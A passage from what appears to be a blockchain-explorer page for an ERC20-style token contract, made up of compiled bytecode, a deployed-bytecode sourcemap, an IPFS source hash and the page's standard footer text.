02160045260246000fd5b6020810160048310611daa57634e487b7160e01b600052602160045260246000fd5b91905290565b600060208284031215611dc257600080fd5b8151611cf681611c09565b634e487b7160e01b600052603260045260246000fd5b600081518084526020808501945080840160005b83811015611e1c5781516001600160a01b031687529582019590820190600101611df7565b509495945050505050565b848152608060208201526000611e406080830186611de3565b6001600160a01b03949094166040830152506060015292915050565b600060208284031215611e6e57600080fd5b8151611cf681611d36565b600181811c90821680611e8d57607f821691505b602082108103611ead57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561099d5761099d611eb3565b600060208284031215611eee57600080fd5b5051919050565b600080600060608486031215611f0a57600080fd5b8351925060208401519150604084015190509250925092565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761099d5761099d611eb3565b600082611fdf57634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561099d5761099d611eb3565b85815284602082015260a06040820152600061201660a0830186611de3565b6001600160a01b039490941660608301525060800152939250505056fea26469706673582212202333896be9770486bdada30ffc4277eb23a6573a1f4b1162af48a51424d7957964736f6c63430008120033
Deployed Bytecode Sourcemap
26842:8529:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27291:64;;;;;;;;;;-1:-1:-1;27291:64:0;;;;-1:-1:-1;;;;;27291:64:0;;;;;;-1:-1:-1;;;;;178:32:1;;;160:51;;148:2;133:18;27291:64:0;;;;;;;;27159:50;;;;;;;;;;;;;;;;;;;368:25:1;;;356:2;341:18;27159:50:0;222:177:1;34479:613:0;;;;;;;;;;-1:-1:-1;34479:613:0;;;;;:::i;:::-;;:::i;:::-;;9589:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;11949:201::-;;;;;;;;;;-1:-1:-1;11949:201:0;;;;;:::i;:::-;;:::i;:::-;;;1578:14:1;;1571:22;1553:41;;1541:2;1526:18;11949:201:0;1413:187:1;27812:51:0;;;;;;;;;;;;;;;10718:108;;;;;;;;;;-1:-1:-1;10806:12:0;;10718:108;;12730:261;;;;;;;;;;-1:-1:-1;12730:261:0;;;;;:::i;:::-;;:::i;27409:34::-;;;;;;;;;;-1:-1:-1;27409:34:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;10560:93;;;;;;;;;;-1:-1:-1;10560:93:0;;10643:2;2695:36:1;;2683:2;2668:18;10560:93:0;2553:184:1;27733:32:0;;;;;;;;;;;;;;;;13400:238;;;;;;;;;;-1:-1:-1;13400:238:0;;;;;:::i;:::-;;:::i;27695:31::-;;;;;;;;;;;;;;;;27870:28;;;;;;;;;;-1:-1:-1;27870:28:0;;;;-1:-1:-1;;;;;27870:28:0;;;34286:185;;;;;;;;;;-1:-1:-1;34286:185:0;;;;;:::i;:::-;;:::i;33154:155::-;;;;;;;;;;;;;:::i;10889:127::-;;;;;;;;;;-1:-1:-1;10889:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;10990:18:0;10963:7;10990:18;;;;;;;;;;;;10889:127;3015:103;;;;;;;;;;;;;:::i;35258:110::-;;;;;;;;;;;;;:::i;27452:50::-;;;;;;;;;;-1:-1:-1;27452:50:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;27041:52;;;;;;;;;;;;;;;;2374:87;;;;;;;;;;-1:-1:-1;2447:6:0;;-1:-1:-1;;;;;2447:6:0;2374:87;;9808:104;;;;;;;;;;;;;:::i;34094:184::-;;;;;;;;;;;;;:::i;14141:436::-;;;;;;;;;;-1:-1:-1;14141:436:0;;;;;:::i;:::-;;:::i;11222:193::-;;;;;;;;;;-1:-1:-1;11222:193:0;;;;;:::i;:::-;;:::i;27100:52::-;;;;;;;;;;;;;;;;27985:30;;;;;;;;;;;;;;;;29247:177;;;;;;;;;;;;;:::i;11478:151::-;;;;;;;;;;-1:-1:-1;11478:151:0;;;;;:::i;:::-;;:::i;27364:38::-;;;;;;;;;;-1:-1:-1;27364:38:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;35100:113;;;;;;;;;;-1:-1:-1;35100:113:0;;;;;:::i;:::-;;:::i;3273:201::-;;;;;;;;;;-1:-1:-1;3273:201:0;;;;;:::i;:::-;;:::i;28756:479::-;;;:::i;27560:25::-;;;;;;;;;;-1:-1:-1;27560:25:0;;;;;;;;;;;;;;;:::i;34479:613::-;34575:16;;;34589:1;34575:16;;;;;;;;34551:21;;34575:16;;;;;;;;;;-1:-1:-1;34575:16:0;34551:40;;34612:15;-1:-1:-1;;;;;34612:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34602:4;34607:1;34602:7;;;;;;;;:::i;:::-;;;;;;:32;-1:-1:-1;;;;;34602:32:0;;;-1:-1:-1;;;;;34602:32:0;;;;;34663:4;34645;34650:1;34645:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;34645:23:0;;;-1:-1:-1;;;;;34645:23:0;;;;;34679:12;34701:4;34706:1;34701:7;;;;;;;;:::i;:::-;;;;;;;;;;;;34736:10;34729:18;;;;:6;:18;;;;;;;;34701:7;;-1:-1:-1;34729:18:0;;34724:361;;34764:195;;-1:-1:-1;;;34764:195:0;;-1:-1:-1;;;;;34764:15:0;:66;;;;34838:6;;34764:195;;34865:1;;34885:4;;34908:2;;34929:15;;34764:195;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34724:361;;;34992:27;35008:2;35012:6;34992:15;:27::i;:::-;35034:5;-1:-1:-1;;;;;35034:18:0;;35053:2;35057:4;35062:1;35057:7;;;;;;;;:::i;:::-;;;;;;;;;;;35034:39;;-1:-1:-1;;;;;;35034:39:0;;;;;;;-1:-1:-1;;;;;5879:15:1;;;35034:39:0;;;5861:34:1;5931:15;;5911:18;;;5904:43;5963:18;;;5956:34;;;5796:18;;35034:39:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34724:361;34540:552;;34479:613;;:::o;9589:100::-;9643:13;9676:5;9669:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9589:100;:::o;11949:201::-;12032:4;996:10;12088:32;996:10;12104:7;12113:6;12088:8;:32::i;:::-;12138:4;12131:11;;;11949:201;;;;;:::o;12730:261::-;12827:4;996:10;12885:38;12901:4;996:10;12916:6;12885:15;:38::i;:::-;12934:27;12944:4;12950:2;12954:6;12934:9;:27::i;:::-;-1:-1:-1;12979:4:0;;12730:261;-1:-1:-1;;;;12730:261:0:o;13400:238::-;13488:4;996:10;13544:64;996:10;13560:7;13597:10;13569:25;996:10;13560:7;13569:9;:25::i;:::-;:38;;;;:::i;:::-;13544:8;:64::i;34286:185::-;2260:13;:11;:13::i;:::-;34392:7:::1;::::0;34414:38:::1;::::0;-1:-1:-1;;;34414:38:0;;34446:4:::1;34414:38;::::0;::::1;160:51:1::0;-1:-1:-1;;;;;34355:22:0;;::::1;::::0;::::1;::::0;34392:7;::::1;::::0;34355:22;;34414:23:::1;::::0;133:18:1;;34414:38:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34355:108;::::0;-1:-1:-1;;;;;;34355:108:0::1;::::0;;;;;;-1:-1:-1;;;;;7279:32:1;;;34355:108:0::1;::::0;::::1;7261:51:1::0;7328:18;;;7321:34;7234:18;;34355:108:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34286:185:::0;:::o;33154:155::-;33215:7;;33233:15;;33207:42;;33190:4;;-1:-1:-1;;;;;33215:7:0;;33207:42;;;;;33190:4;33207:42;33190:4;33207:42;33233:15;33215:7;33207:42;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;33278:1:0;33260:15;:19;33297:4;;33154:155::o;3015:103::-;2260:13;:11;:13::i;:::-;3080:30:::1;3107:1;3080:18;:30::i;:::-;3015:103::o:0;35258:110::-;2260:13;:11;:13::i;:::-;27015:19:::1;35312:11;:21:::0;;;35335:15:::1;:25:::0;35258:110::o;9808:104::-;9864:13;9897:7;9890:14;;;;;:::i;34094:184::-;34147:4;2260:13;:11;:13::i;:::-;-1:-1:-1;34164:12:0::1;:27:::0;;-1:-1:-1;;34164:27:0::1;34179:12;34164:27;::::0;;-1:-1:-1;34202:12:0::1;:16:::0;;;34229:13:::1;:17:::0;34164:27;;34094:184::o;14141:436::-;14234:4;996:10;14234:4;14317:25;996:10;14334:7;14317:9;:25::i;:::-;14290:52;;14381:15;14361:16;:35;;14353:85;;;;-1:-1:-1;;;14353:85:0;;7568:2:1;14353:85:0;;;7550:21:1;7607:2;7587:18;;;7580:30;7646:34;7626:18;;;7619:62;-1:-1:-1;;;7697:18:1;;;7690:35;7742:19;;14353:85:0;;;;;;;;;14474:60;14483:5;14490:7;14518:15;14499:16;:34;14474:8;:60::i;11222:193::-;11301:4;996:10;11357:28;996:10;11374:2;11378:6;11357:9;:28::i;29247:177::-;2260:13;:11;:13::i;:::-;29309:14:::1;::::0;;;::::1;;;29308:15;29300:54;;;::::0;-1:-1:-1;;;29300:54:0;;7974:2:1;29300:54:0::1;::::0;::::1;7956:21:1::0;8013:2;7993:18;;;7986:30;8052:28;8032:18;;;8025:56;8098:18;;29300:54:0::1;7772:350:1::0;29300:54:0::1;29365:14;:21:::0;;-1:-1:-1;;29397:19:0;;;;;29247:177::o;11478:151::-;-1:-1:-1;;;;;11594:18:0;;;11567:7;11594:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11478:151::o;35100:113::-;2260:13;:11;:13::i;:::-;-1:-1:-1;;;;;35187:8:0;;;::::1;;::::0;;;:2:::1;:8;::::0;;;;:18;;-1:-1:-1;;35187:18:0::1;::::0;::::1;;::::0;;;::::1;::::0;;35100:113::o;3273:201::-;2260:13;:11;:13::i;:::-;-1:-1:-1;;;;;3362:22:0;::::1;3354:73;;;::::0;-1:-1:-1;;;3354:73:0;;8329:2:1;3354:73:0::1;::::0;::::1;8311:21:1::0;8368:2;8348:18;;;8341:30;8407:34;8387:18;;;8380:62;-1:-1:-1;;;8458:18:1;;;8451:36;8504:19;;3354:73:0::1;8127:402:1::0;3354:73:0::1;3438:28;3457:8;3438:18;:28::i;:::-;3273:201:::0;:::o;28756:479::-;2260:13;:11;:13::i;:::-;28848:15:::1;-1:-1:-1::0;;;;;28848:23:0::1;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;28830:55:0::1;;28894:4;28901:15;-1:-1:-1::0;;;;;28901:20:0::1;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;28830:94;::::0;-1:-1:-1;;;;;;28830:94:0::1;::::0;;;;;;-1:-1:-1;;;;;8764:15:1;;;28830:94:0::1;::::0;::::1;8746:34:1::0;8816:15;;8796:18;;;8789:43;8681:18;;28830:94:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;28814:13;:110:::0;;-1:-1:-1;;;;;;28814:110:0::1;-1:-1:-1::0;;;;;28814:110:0;;;::::1;::::0;;;::::1;::::0;;28935:68:::1;28952:4;28967:15;-1:-1:-1::0;;28935:8:0::1;:68::i;:::-;29014:15;-1:-1:-1::0;;;;;29014:31:0::1;;29053:9;29086:4;29106:24;29124:4;-1:-1:-1::0;;;;;10990:18:0;10963:7;10990:18;;;;;;;;;;;;10889:127;29106:24:::1;29145:1;29162::::0;29179:7:::1;2447:6:::0;;-1:-1:-1;;;;;2447:6:0;;2374:87;29179:7:::1;29014:213;::::0;::::1;::::0;;;-1:-1:-1;;;;;;29014:213:0;;;-1:-1:-1;;;;;9202:15:1;;;29014:213:0::1;::::0;::::1;9184:34:1::0;9234:18;;;9227:34;;;;9277:18;;;9270:34;;;;9320:18;;;9313:34;9384:15;;;9363:19;;;9356:44;29201:15:0::1;9416:19:1::0;;;9409:35;9118:19;;29014:213:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;28756:479::o:0;19198:361::-;19308:4;19284:13;19351:25;19308:4;19368:7;19351:9;:25::i;:::-;19324:52;;-1:-1:-1;;19391:16:0;:37;19387:165;;19474:51;19483:7;19492:5;19518:6;19499:16;:25;18134:346;-1:-1:-1;;;;;18236:19:0;;18228:68;;;;-1:-1:-1;;;18228:68:0;;9968:2:1;18228:68:0;;;9950:21:1;10007:2;9987:18;;;9980:30;10046:34;10026:18;;;10019:62;-1:-1:-1;;;10097:18:1;;;10090:34;10141:19;;18228:68:0;9766:400:1;18228:68:0;-1:-1:-1;;;;;18315:21:0;;18307:68;;;;-1:-1:-1;;;18307:68:0;;10373:2:1;18307:68:0;;;10355:21:1;10412:2;10392:18;;;10385:30;10451:34;10431:18;;;10424:62;-1:-1:-1;;;10502:18:1;;;10495:32;10544:19;;18307:68:0;10171:398:1;18307:68:0;-1:-1:-1;;;;;18388:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18440:32;;368:25:1;;;18440:32:0;;341:18:1;18440:32:0;;;;;;;18134:346;;;:::o;18771:419::-;18872:24;18899:25;18909:5;18916:7;18899:9;:25::i;:::-;18872:52;;-1:-1:-1;;18939:16:0;:37;18935:248;;19021:6;19001:16;:26;;18993:68;;;;-1:-1:-1;;;18993:68:0;;10776:2:1;18993:68:0;;;10758:21:1;10815:2;10795:18;;;10788:30;10854:31;10834:18;;;10827:59;10903:18;;18993:68:0;10574:353:1;18993:68:0;19105:51;19114:5;19121:7;19149:6;19130:16;:25;19105:8;:51::i;29432:2861::-;-1:-1:-1;;;;;29566:18:0;;29558:68;;;;-1:-1:-1;;;29558:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;29645:16:0;;29637:64;;;;-1:-1:-1;;;29637:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;29717:12:0;;;;;;:6;:12;;;;;;;;29716:13;:28;;;;-1:-1:-1;;;;;;29734:10:0;;;;;;:6;:10;;;;;;;;29733:11;29716:28;29712:107;;;29769:14;;;;;;;29761:46;;;;-1:-1:-1;;;29761:46:0;;11944:2:1;29761:46:0;;;11926:21:1;11983:2;11963:18;;;11956:30;-1:-1:-1;;;12002:18:1;;;11995:49;12061:18;;29761:46:0;11742:343:1;29761:46:0;-1:-1:-1;;;;;29836:8:0;;;;;;:2;:8;;;;;;;;29835:9;:20;;;;-1:-1:-1;;;;;;29849:6:0;;;;;;:2;:6;;;;;;;;29848:7;29835:20;29831:398;;;29883:13;;-1:-1:-1;;;;;29877:19:0;;;29883:13;;29877:19;29873:345;;29935:11;;29925:6;:21;;29917:95;;;;-1:-1:-1;;;29917:95:0;;12292:2:1;29917:95:0;;;12274:21:1;12331:2;12311:18;;;12304:30;12370:34;12350:18;;;12343:62;12441:31;12421:18;;;12414:59;12490:19;;29917:95:0;12090:425:1;29917:95:0;30089:15;;-1:-1:-1;;;;;10990:18:0;;10963:7;10990:18;;;;;;;;;;;30062:22;;:6;:22;:::i;:::-;30061:43;;30031:171;;;;-1:-1:-1;;;30031:171:0;;12722:2:1;30031:171:0;;;12704:21:1;12761:2;12741:18;;;12734:30;12800:34;12780:18;;;12773:62;-1:-1:-1;;;12851:18:1;;;12844:52;12913:19;;30031:171:0;12520:418:1;30031:171:0;-1:-1:-1;;;;;30288:12:0;;30241:22;30288:12;;;:6;:12;;;;;;30266:6;;30288:12;;30287:13;:28;;;;-1:-1:-1;;;;;;30305:10:0;;;;;;:6;:10;;;;;;;;30304:11;30287:28;30283:1951;;;30345:13;;-1:-1:-1;;;;;30337:21:0;;;30345:13;;30337:21;;:44;;-1:-1:-1;30368:13:0;;-1:-1:-1;;;;;30362:19:0;;;30368:13;;30362:19;30337:44;30332:1891;;;30421:11;;30411:6;:21;;30403:91;;;;-1:-1:-1;;;30403:91:0;;13145:2:1;30403:91:0;;;13127:21:1;13184:2;13164:18;;;13157:30;13223:34;13203:18;;;13196:62;13294:27;13274:18;;;13267:55;13339:19;;30403:91:0;12943:421:1;30403:91:0;30542:13;;-1:-1:-1;;;;;30542:21:0;;;:13;;:21;:53;;;;-1:-1:-1;;;;;;30589:6:0;;;;;;:2;:6;;;;;;;;30588:7;30542:53;:99;;;;-1:-1:-1;;;;;;30620:21:0;;30636:4;30620:21;;30542:99;30516:505;;;30706:12;30690;;;;:28;;;;;;;;:::i;:::-;;30686:114;;-1:-1:-1;;;;;30747:22:0;;;;;;:18;:22;;;;;:29;;-1:-1:-1;;30747:29:0;30772:4;30747:29;;;30686:114;30824:17;30870:3;30854:12;;30845:6;:21;;;;:::i;:::-;30844:29;;;;:::i;:::-;30824:49;;30896:47;30912:4;30926;30933:9;30896:15;:47::i;:::-;30983:18;30992:9;30983:6;:18;:::i;:::-;30966:35;;30661:360;30516:505;31067:13;;-1:-1:-1;;;;;31067:19:0;;;:13;;:19;:53;;;;-1:-1:-1;;;;;;31112:8:0;;;;;;:2;:8;;;;;;;;31111:9;31067:53;:97;;;;-1:-1:-1;;;;;;31145:19:0;;31159:4;31145:19;;31067:97;:134;;;;-1:-1:-1;31189:12:0;;;;;;;31067:134;:174;;;;-1:-1:-1;31228:13:0;;;;;;;31227:14;31067:174;31041:773;;;31324:13;;-1:-1:-1;;;;;31364:24:0;;31306:15;31364:24;;;:18;:24;;;;;;;;:32;;:24;:32;31360:110;;-1:-1:-1;31435:11:0;;31360:110;31494:13;:20;;-1:-1:-1;;31494:20:0;;;;;31537:16;:14;:16::i;:::-;31576:13;:21;;-1:-1:-1;;31576:21:0;;;31592:5;31663:3;31643:16;31652:7;31643:6;:16;:::i;:::-;31642:24;;;;:::i;:::-;31622:44;;31689:47;31705:4;31719;31726:9;31689:15;:47::i;:::-;31776:18;31785:9;31776:6;:18;:::i;:::-;31759:35;;31261:553;;31041:773;30332:1891;;;-1:-1:-1;;;;;31893:24:0;;;;;;:18;:24;;;;;;;;:32;;:24;:32;:76;;;;-1:-1:-1;31950:13:0;;-1:-1:-1;;;;;31950:19:0;;;:13;;:19;;31893:76;31867:341;;;32012:17;32057:3;32042:11;;32033:6;:20;;;;:::i;:::-;32032:28;;;;:::i;:::-;32012:48;;32083:47;32099:4;32113;32120:9;32083:15;:47::i;:::-;32170:18;32179:9;32170:6;:18;:::i;:::-;32153:35;;31989:219;31867:341;32244:41;32260:4;32266:2;32270:14;32244:15;:41::i;2539:132::-;2447:6;;-1:-1:-1;;;;;2447:6:0;996:10;2603:23;2595:68;;;;-1:-1:-1;;;2595:68:0;;14099:2:1;2595:68:0;;;14081:21:1;;;14118:18;;;14111:30;14177:34;14157:18;;;14150:62;14229:18;;2595:68:0;13897:356:1;3634:191:0;3727:6;;;-1:-1:-1;;;;;3744:17:0;;;-1:-1:-1;;;;;;3744:17:0;;;;;;;3777:40;;3727:6;;;3744:17;3727:6;;3777:40;;3708:16;;3777:40;3697:128;3634:191;:::o;15047:806::-;-1:-1:-1;;;;;15144:18:0;;15136:68;;;;-1:-1:-1;;;15136:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15223:16:0;;15215:64;;;;-1:-1:-1;;;15215:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;15365:15:0;;15343:19;15365:15;;;;;;;;;;;15399:21;;;;15391:72;;;;-1:-1:-1;;;15391:72:0;;14460:2:1;15391:72:0;;;14442:21:1;14499:2;14479:18;;;14472:30;14538:34;14518:18;;;14511:62;-1:-1:-1;;;14589:18:1;;;14582:36;14635:19;;15391:72:0;14258:402:1;15391:72:0;-1:-1:-1;;;;;15499:15:0;;;:9;:15;;;;;;;;;;;15517:20;;;15499:38;;15717:13;;;;;;;;;;:23;;;;;;15769:26;;368:25:1;;;15717:13:0;;15769:26;;341:18:1;15769:26:0;;;;;;;15808:37;28756:479;32301:844;32369:4;10963:7;10990:18;;;;;;;;;;;32379:1;32351:29;32347:68;;32301:844::o;32347:68::-;32519:4;32425:19;10990:18;;;;;;;;;;;;32631:7;;-1:-1:-1;;;;;32631:7:0;10990:18;;;;;;32708:13;;32564:21;;10990:18;32425:19;;32685:36;;32681:446;;;32758:21;32742:37;;32798:42;32816:20;32838:1;32798:17;:42::i;:::-;32873:37;32897:13;32873:21;:37;:::i;:::-;32859:51;;32946:13;;32933:10;:26;32929:134;;;33017:7;:25;;33041:1;33017:25;;;33027:11;33017:25;33002:41;;:11;:41;:::i;:::-;32984:15;:59;32929:134;33100:11;33081:15;;:30;;;;;;;:::i;:::-;;;;-1:-1:-1;;32455:683:0;;;;32336:809;32301:844::o;33498:588::-;33639:16;;;33653:1;33639:16;;;;;;;;33615:21;;33639:16;;;;;;;;;;-1:-1:-1;33639:16:0;33615:40;;33684:4;33666;33671:1;33666:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;33666:23:0;;;-1:-1:-1;;;;;33666:23:0;;;;;33710:15;-1:-1:-1;;;;;33710:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;33700:4;33705:1;33700:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;33700:32:0;;;:7;;;;;;;;;:32;33745:111;;-1:-1:-1;;;33745:111:0;;33797:15;7279:32:1;;;33745:111:0;;;7261:51:1;-1:-1:-1;;7328:18:1;;;7321:34;33760:4:0;;33745:29;;7234:18:1;;33745:111:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;33869:209:0;;-1:-1:-1;;;33869:209:0;;-1:-1:-1;;;;;33869:15:0;:66;;;;:209;;33950:11;;33976:14;;34005:4;;34032;;34052:15;;33869:209;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33604:482;33498:588;;:::o;404:131:1:-;-1:-1:-1;;;;;479:31:1;;469:42;;459:70;;525:1;522;515:12;540:315;608:6;616;669:2;657:9;648:7;644:23;640:32;637:52;;;685:1;682;675:12;637:52;724:9;711:23;743:31;768:5;743:31;:::i;:::-;793:5;845:2;830:18;;;;817:32;;-1:-1:-1;;;540:315:1:o;860:548::-;972:4;1001:2;1030;1019:9;1012:21;1062:6;1056:13;1105:6;1100:2;1089:9;1085:18;1078:34;1130:1;1140:140;1154:6;1151:1;1148:13;1140:140;;;1249:14;;;1245:23;;1239:30;1215:17;;;1234:2;1211:26;1204:66;1169:10;;1140:140;;;1144:3;1329:1;1324:2;1315:6;1304:9;1300:22;1296:31;1289:42;1399:2;1392;1388:7;1383:2;1375:6;1371:15;1367:29;1356:9;1352:45;1348:54;1340:62;;;;860:548;;;;:::o;1840:456::-;1917:6;1925;1933;1986:2;1974:9;1965:7;1961:23;1957:32;1954:52;;;2002:1;1999;1992:12;1954:52;2041:9;2028:23;2060:31;2085:5;2060:31;:::i;:::-;2110:5;-1:-1:-1;2167:2:1;2152:18;;2139:32;2180:33;2139:32;2180:33;:::i;:::-;1840:456;;2232:7;;-1:-1:-1;;;2286:2:1;2271:18;;;;2258:32;;1840:456::o;2301:247::-;2360:6;2413:2;2401:9;2392:7;2388:23;2384:32;2381:52;;;2429:1;2426;2419:12;2381:52;2468:9;2455:23;2487:31;2512:5;2487:31;:::i;:::-;2537:5;2301:247;-1:-1:-1;;;2301:247:1:o;2742:388::-;2810:6;2818;2871:2;2859:9;2850:7;2846:23;2842:32;2839:52;;;2887:1;2884;2877:12;2839:52;2926:9;2913:23;2945:31;2970:5;2945:31;:::i;:::-;2995:5;-1:-1:-1;3052:2:1;3037:18;;3024:32;3065:33;3024:32;3065:33;:::i;:::-;3117:7;3107:17;;;2742:388;;;;;:::o;3135:118::-;3221:5;3214:13;3207:21;3200:5;3197:32;3187:60;;3243:1;3240;3233:12;3258:382;3323:6;3331;3384:2;3372:9;3363:7;3359:23;3355:32;3352:52;;;3400:1;3397;3390:12;3352:52;3439:9;3426:23;3458:31;3483:5;3458:31;:::i;:::-;3508:5;-1:-1:-1;3565:2:1;3550:18;;3537:32;3578:30;3537:32;3578:30;:::i;3645:127::-;3706:10;3701:3;3697:20;3694:1;3687:31;3737:4;3734:1;3727:15;3761:4;3758:1;3751:15;3777:338;3919:2;3904:18;;3952:1;3941:13;;3931:144;;3997:10;3992:3;3988:20;3985:1;3978:31;4032:4;4029:1;4022:15;4060:4;4057:1;4050:15;3931:144;4084:25;;;3777:338;:::o;4252:251::-;4322:6;4375:2;4363:9;4354:7;4350:23;4346:32;4343:52;;;4391:1;4388;4381:12;4343:52;4423:9;4417:16;4442:31;4467:5;4442:31;:::i;4508:127::-;4569:10;4564:3;4560:20;4557:1;4550:31;4600:4;4597:1;4590:15;4624:4;4621:1;4614:15;4640:461;4693:3;4731:5;4725:12;4758:6;4753:3;4746:19;4784:4;4813:2;4808:3;4804:12;4797:19;;4850:2;4843:5;4839:14;4871:1;4881:195;4895:6;4892:1;4889:13;4881:195;;;4960:13;;-1:-1:-1;;;;;4956:39:1;4944:52;;5016:12;;;;5051:15;;;;4992:1;4910:9;4881:195;;;-1:-1:-1;5092:3:1;;4640:461;-1:-1:-1;;;;;4640:461:1:o;5106:510::-;5377:6;5366:9;5359:25;5420:3;5415:2;5404:9;5400:18;5393:31;5340:4;5441:57;5493:3;5482:9;5478:19;5470:6;5441:57;:::i;:::-;-1:-1:-1;;;;;5534:32:1;;;;5529:2;5514:18;;5507:60;-1:-1:-1;5598:2:1;5583:18;5576:34;5433:65;5106:510;-1:-1:-1;;5106:510:1:o;6001:245::-;6068:6;6121:2;6109:9;6100:7;6096:23;6092:32;6089:52;;;6137:1;6134;6127:12;6089:52;6169:9;6163:16;6188:28;6210:5;6188:28;:::i;6251:380::-;6330:1;6326:12;;;;6373;;;6394:61;;6448:4;6440:6;6436:17;6426:27;;6394:61;6501:2;6493:6;6490:14;6470:18;6467:38;6464:161;;6547:10;6542:3;6538:20;6535:1;6528:31;6582:4;6579:1;6572:15;6610:4;6607:1;6600:15;6464:161;;6251:380;;;:::o;6636:127::-;6697:10;6692:3;6688:20;6685:1;6678:31;6728:4;6725:1;6718:15;6752:4;6749:1;6742:15;6768:125;6833:9;;;6854:10;;;6851:36;;;6867:18;;:::i;6898:184::-;6968:6;7021:2;7009:9;7000:7;6996:23;6992:32;6989:52;;;7037:1;7034;7027:12;6989:52;-1:-1:-1;7060:16:1;;6898:184;-1:-1:-1;6898:184:1:o;9455:306::-;9543:6;9551;9559;9612:2;9600:9;9591:7;9587:23;9583:32;9580:52;;;9628:1;9625;9618:12;9580:52;9657:9;9651:16;9641:26;;9707:2;9696:9;9692:18;9686:25;9676:35;;9751:2;9740:9;9736:18;9730:25;9720:35;;9455:306;;;;;:::o;10932:401::-;11134:2;11116:21;;;11173:2;11153:18;;;11146:30;11212:34;11207:2;11192:18;;11185:62;-1:-1:-1;;;11278:2:1;11263:18;;11256:35;11323:3;11308:19;;10932:401::o;11338:399::-;11540:2;11522:21;;;11579:2;11559:18;;;11552:30;11618:34;11613:2;11598:18;;11591:62;-1:-1:-1;;;11684:2:1;11669:18;;11662:33;11727:3;11712:19;;11338:399::o;13369:168::-;13442:9;;;13473;;13490:15;;;13484:22;;13470:37;13460:71;;13511:18;;:::i;13542:217::-;13582:1;13608;13598:132;;13652:10;13647:3;13643:20;13640:1;13633:31;13687:4;13684:1;13677:15;13715:4;13712:1;13705:15;13598:132;-1:-1:-1;13744:9:1;;13542:217::o;13764:128::-;13831:9;;;13852:11;;;13849:37;;;13866:18;;:::i;14665:574::-;14956:6;14945:9;14938:25;14999:6;14994:2;14983:9;14979:18;14972:34;15042:3;15037:2;15026:9;15022:18;15015:31;14919:4;15063:57;15115:3;15104:9;15100:19;15092:6;15063:57;:::i;:::-;-1:-1:-1;;;;;15156:32:1;;;;15151:2;15136:18;;15129:60;-1:-1:-1;15220:3:1;15205:19;15198:35;15055:65;14665:574;-1:-1:-1;;;14665:574:1:o
Swarm Source
ipfs://2333896be9770486bdada30ffc4277eb23a6573a1f4b1162af48a51424d79579
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.